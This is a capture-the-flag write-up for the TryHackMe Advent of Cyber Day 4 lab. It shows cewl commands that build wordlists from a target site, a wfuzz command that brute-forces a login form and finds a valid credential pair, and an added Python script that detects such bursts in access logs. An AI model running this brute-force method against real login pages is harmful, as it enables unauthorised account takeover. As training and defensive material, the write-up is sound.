Challenge Information
- Advent of Cyber Day 4
- THM link here
Explanation
This challenge focuses on 2 main tools: `cewl` and `wfuzz`. `cewl` is a tool that generates candidate credentials from the information it retrieves from a website, while `wfuzz` is a brute-forcing tool. To solve the challenge, the first thing to do is to get a list of candidate credentials using `cewl`.
```
cewl http://10.10.166.184 -d 2 -m 5 -w out.txt --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
cewl http://10.10.166.184/team.php -d 0 -m 5 -w out2.txt --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
```
Of the two commands, the first generates the password list (`out.txt`) from the website, while the second generates the username list (`out2.txt`) from `team.php`. After getting the potential credentials, the next thing is to brute-force the login form using `wfuzz`.
```
wfuzz -c -z file,out2.txt -z file,out.txt --hs "Please enter the correct credentials" -u http://10.10.166.184/login.php -d "username=FUZZ&password=FUZ2Z"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.166.184/login.php
Total requests: 9361

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000006317:   302        118 L    297 W      4442 Ch     "isaias - Happiness"
```
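We managed to brute-force the login using the credentials generated by `cewl`. The `--hs` filter hides every response that contains the failure message, so the one row left, a 302 redirect, is the valid username and password pair. Since we have the login credentials, we can just log in and get the flag.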
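Seen from the defending side, the run above leaves a clear trace in the web server's access log: thousands of POSTs to `/login.php` from one client, ending in a 302. The Python below is an added example, not part of the original write-up, that flags that pattern. It assumes combined-format access logs and that a failed login returns 200; the log lines, IP addresses and thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Start of an Apache/nginx "combined" log line: client, time, request, status.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_bruteforce(lines, path="/login.php", threshold=20,
                    window=timedelta(seconds=60)):
    """Flag clients with >= threshold failed POSTs to path inside window.
    Assumption: a failed login is a 200 (form shown again), a success a 302."""
    events = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?")[0] == path:
            ts = datetime.strptime(m["ts"], TS_FMT)
            events[m["ip"]].append((ts, int(m["status"])))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        recent, burst_end, failures, success = [], None, 0, False
        for ts, status in evs:
            if status == 200:
                failures += 1
                recent.append(ts)
                while ts - recent[0] > window:  # drop failures outside the window
                    recent.pop(0)
                if len(recent) >= threshold:
                    burst_end = ts
            elif status == 302 and burst_end and ts - burst_end <= window:
                success = True  # redirect right after a burst: likely a valid guess
        if burst_end:
            findings[ip] = {"failures": failures, "success_after_burst": success}
    return findings

def sample_log():
    """Constructed sample: one client guessing 10 logins/second, one normal user."""
    base = datetime.strptime("04/Dec/2023:10:00:00 +0000", TS_FMT)
    def row(ip, sec, status):
        ts = (base + timedelta(seconds=sec)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "POST /login.php HTTP/1.1" {status} 4442 "-" "-"'
    rows = [row("198.51.100.7", i // 10, 200) for i in range(300)]
    rows.append(row("198.51.100.7", 30, 302))
    rows += [row("203.0.113.5", 5, 200), row("203.0.113.5", 40, 302)]
    return rows

if __name__ == "__main__":
    print(find_bruteforce(sample_log()))
```

A finding with `success_after_burst` set is the case to triage first, since it means an account was probably guessed; rate limiting or lockout on the login form keeps a run like this from reaching that point.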
Things I learned from the challenge
- brute-forcing using `wfuzz`
- generating credentials using `cewl`